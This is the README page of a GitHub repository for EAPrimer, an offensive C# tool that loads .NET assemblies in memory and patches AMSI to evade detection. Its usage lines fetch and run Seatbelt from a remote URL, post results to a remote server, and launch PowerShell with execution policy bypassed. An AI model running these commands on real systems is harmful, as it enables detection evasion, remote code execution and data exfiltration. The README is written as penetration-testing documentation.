Skip to content
/ EAPrimer Public

C# project to Reflectively load .Net assemblies in memory

License

Notifications You must be signed in to change notification settings

m8sec/EAPrimer

Folders and files

NameName
Last commit message
Last commit date

Latest commit

37e2c9f · Jun 19, 2024

History

8 Commits
Jun 19, 2024
Mar 10, 2022
Oct 27, 2023
Mar 10, 2022
Oct 27, 2023
Mar 10, 2022
Oct 27, 2023

Repository files navigation

EAPrimer

EAPrimer can be used to load .Net assemblies from a filepath or URL. On startup, it will attempt to perform in-memory patching of AMSI to bypass detection. By default, output is written to the console, however, this can be directed to a file or even sent via HTTP POST request to a remote server.

The latest, compiled version of the code is available here.

Usage:

Execute remote file with arguments and send output to server:

EAPrimer.exe -path=https://192.168.1.2/Seatbelt.exe -post=https://192.168.1.2 -args="-group=all"

Execute local file with arguments and write output to file:

EAPrimer.exe -path=.\Seatbelt.exe -post=results.txt -args="-group=all"

Invoke-EAPrimer.ps1

The main purpose for writing EAPrimer.exe was to act as a support, or "Primer", for executing assemblies. Ultimately allowing for an "execute_assembly" module in pentest frameworks such as ActiveReign and CrackMapExec. The PowerShell script allows for added flexibility to create these modules.

⚠️ Alternate methods have since been used to more efficiently load .NET assemblies in memory. However, I have kept this file in the repo as an additional PoC.

Usage:

powershell -exec bypass
Import-Module .\Invoke-EAPrimer.ps1
Invoke-EAPrimer -Path .\Seatbelt.exe -Args -group=all

Credit

This was one of my first deep dives into C# and much of the heavy lifting was already done by these guys:

Notes

  • Built with .Net 4.0
  • Checkout SharpCollection for hosted payloads to test it out!

Releases

No releases published

Packages

No packages published